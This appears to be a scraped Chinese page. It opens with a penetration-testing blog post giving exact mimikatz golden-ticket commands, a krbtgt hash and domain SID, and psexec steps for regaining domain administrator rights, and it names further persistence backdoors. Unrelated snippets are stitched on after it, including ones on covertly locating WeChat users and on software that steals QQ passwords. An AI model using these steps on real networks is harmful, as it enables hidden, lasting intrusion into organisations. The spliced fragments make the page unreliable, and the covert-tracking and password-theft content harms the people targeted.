最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。
我原来发过一个微博说
这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:
要重新拿回域管理员权限,首先要先知道域内的管理员有谁
我这里的实验环境,通过截图可以看到域管理员是administrator
我还要知道域SID是啥
我的域SID是
还有最重要的krbtgt用户的ntlm哈希,我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后该用神器mimikatz出场了,依次执行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到现在,我们又重新拥有域管理员权限了,可以验证下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。
当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。
【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】
苹果手机流量显示在哪里 1、第一步:打开手机设置 首先,我们需要在手机主界面中找到 “设置” 应用,点击进入。第二步:点击“蜂窝移动数据”在设置界面中,点击“蜂窝移动数据”选项,进入到手机流量控制菜单...
如果对于对方想要发一个位置,那么知道他的定位的话,这是很简单的,如果对方同意,那么就能够直接知道他的位置,那么怎么才能做到微信定位不让对方知道呢?这就...
现在有种软件就是你做个软件类似CF解封器呀绑定上你的邮箱只要有人一用那么他的QQ跟密码自动发到你的邮箱里现在盗号没那么简单了大家都设。 告诉号主给他一万块买他都QQ不行就十万,一百万,一千五只要你出...
牢。读láo。《说文解字》给的表述是:“闲,养殖牛马圈也。从牛,冬省。取其四周帀也。”它是个会意字。“闲”,是栅栏的意思。养殖牛马用的圈,用护栏排成。因此 牢的本意便是关牛、马等家畜的圈栏。这个字...
移动营业厅防护意识这么垃圾那他还生存得下去吗,当然也不要小看了黑客 发短信获取验证码,我把它大致分为三个步骤:(1)前端触发获取验证码,同步显示有效验证倒计时;(2)后台通过代理平台发送验证短信;(3...
在孩子小的时候总会出现不喜欢吃饭的情况,有的孩子在家长的威逼利诱下孩子是不吃,仿佛像是一个霸主怎么也无法让孩子吃一勺子辅食,其实在孩子吃饭的时候家长也要对装食物的餐具下功夫哦。下面友谊长存的小编为大家...